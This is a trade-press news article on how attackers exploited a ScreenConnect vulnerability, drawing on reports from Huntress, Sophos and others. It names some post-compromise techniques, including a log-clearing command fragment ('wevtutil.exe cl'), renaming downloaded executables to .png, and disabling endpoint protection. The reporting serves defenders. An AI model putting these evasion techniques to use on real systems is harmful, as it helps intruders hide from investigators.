Cyber hackers had a field day following last month’s disclosure of a serious vulnerability in ConnectWise’s ScreenConnect remote support tool, attacking at least one MSP and its customers, according to reports.
Attackers tried various tricks to deliver malicious payloads, infiltrate systems to create new users and install code for later activity, and attempt to cover their tracks. These attempts occurred even though ConnectWise acted quickly to mitigate cloud-based ScreenConnect instances and release a patch for on-premise implementations. The company also paused functionality where possible for on-prem systems.
ConnectWise itself “did not experience a data breach, intrusion, or ransomware event,” the company clarified in a statement to MSP Success. A third party discovered the vulnerability and reported it to ConnectWise through a voluntary disclosure process.
“Once validated, ConnectWise mitigated all cloud instances of ScreenConnect within 48 hours. On February 19th, we released a patch for all on-prem ScreenConnect customers, posted a security bulletin on the ConnectWise Trust Center, and sent patching instructions to ScreenConnect customers,” the company said.
Despite its strong recommendation to patch on-premise systems, some customers did not act quickly enough. And threat actors couldn’t have been happier, launching all manner of attempts to exploit the vulnerability, according to a report released by Huntress, a managed security platform provider, about activity targeting its customers.
The vulnerability affected thousands of ScreenConnect servers, Huntress reported. “Unfortunately, many who were unable to patch in time suffered serious consequences. Attackers were using their new access to do all sorts of devious things, including dropping ransomware, cryptocurrency coin miners, and additional remote access [intended] to retain a presence on devices even after the ScreenConnect vulnerabilities were resolved.”
RMM Dilemma
Despite ConnectWise’s quick action to mitigate the ScreenConnect problem, concerns remain about the potential use of RMM software by cyber threat actors. By breaching remote management tools, hackers potentially open a gate to hundreds, even thousands, of organizations that use the tool.
Users view RMM software as a trusted source of patches and updates, and hackers know that. Because of that trust, users may not recognize attempts by hackers to use RMM to push out malware, John Hammond, principal security researcher at Huntress, told MSP Success.
“This category of software is a popular attack vector due to its high frequency of legitimate use. The frequent legitimate use allows the malicious use to often be missed by security tools,” he says.
RMM tools inadvertently give the same functionality to hackers and IT teams, Huntress CEO Kyle Hanslovan explained to media last month. “With remote access software, the bad guys can push ransomware as easily as the good guys can push a patch,” he said. That’s an issue that needs to be addressed, he says.
In its statement, ConnectWise acknowledged the problem: “While usually used for IT service delivery and product support, attackers can misuse remote control tools to facilitate malicious activities.”
Bag of Old Tricks
Exploits and attempted exploits of the ScreenConnect vulnerability by and large consisted of old tricks, according to Huntress. “It’s worth driving this point home: most of the post-compromise activities … aren’t novel, original, or outstanding. Most threat actors simply don’t know what to do beyond the same usual, procedural tradecraft.”
A number of adversaries, according to the Huntress report, took the opportunity to deploy ransomware variants such as LockBit. “We observed other ransomware attempts, like upd.exe and svchost.exe, that Microsoft Defender consistently neutralized.”
The appearance of LockBit, in particular, caught the attention of cybersecurity professionals because, as Matt Holland, founder and CEO of cybersecurity vendor Field Effect, noted, the LockBit ransomware group “was recently the target of a global takedown operation that seized its websites, crypto wallets, and data.”
Unlike other groups, which usually lie low and resurface with new branding and tools after similar takedowns, LockBit doubled down, he said. “They’ve made it clear they have no intention of leaving the ransomware business anytime soon. LockBit’s quick recovery demonstrates just how hard it is to permanently neutralize ransomware groups who seemingly regroup and re-tool as quickly as law enforcement agencies can take them down.”
In some cases, hackers sought to cover their tracks with attempts to remove event logs via wevtutil.exe cl “to frustrate investigators’ analysis at a later time.” The Huntress Managed EDR software caught these attempts.
One attacker tried to identify systems with the highest privileges within a network intending to take action at a later date, Huntress said.
Other malicious activity included the use of ScreenConnect access to deploy cryptocurrency coin miners. There were also attempts to install additional remote access tools to maintain a presence in the compromised systems after the “ScreenConnect fiasco has been cleared up,” Huntress said.
One hacker used ScreenConnect access to download and run an SSH backdoor, which would allow the attacker to bypass normal authentication systems. “We also observed an adversary download the SimpleHelp RMM via curl and rename the executables to .png’s in an attempt to evade detection,” Huntress said in its report.
Attempts to Move Deeper
Other cybersecurity vendors also detected activity involving ScreenConnect. Sophos saw multiple attempts to “move deeper into customer networks,” the vendor reported. One attacker used PowerShell to try “to obtain a list of local user accounts on the server.”
Another threat actor tried to disable Sophos endpoint protection. “Then they attempted to install a Cloudflare Tunnel client to be used as a backdoor, downloading it from Cloudflare’s GitHub page. They also ran a number of PowerShell commands in an attempt to carry out reconnaissance and establish persistence on the compromised server,” Sophos said.
In another instance, Sophos caught a threat actor pushing a remote access trojan (RAT) to vulnerable servers. Sophos analysts found the hacker was installing a new instance of the ScreenConnect client on an infected device. The hacker then used their own ScreenConnect client to talk to and remotely manage the target’s ScreenConnect server. “The infected device later launched various PowerShell commands,” Sophos reported.
The cyber research team at InsurSec provider At-Bay found that attackers targeted an MSP, “which led to its customers being impacted in what could be classified as a supply chain attack.”
Field Effect’s Holland warned the exploitation of ScreenConnect vulnerabilities by LockBit and other ransomware actors likely will persist as long as vulnerable servers remain exposed to the internet. “It’s vital that MSPs check across their clients’ environments for vulnerable ScreenConnect servers and either uninstall, disable, or block external connectivity to the servers,” he said.
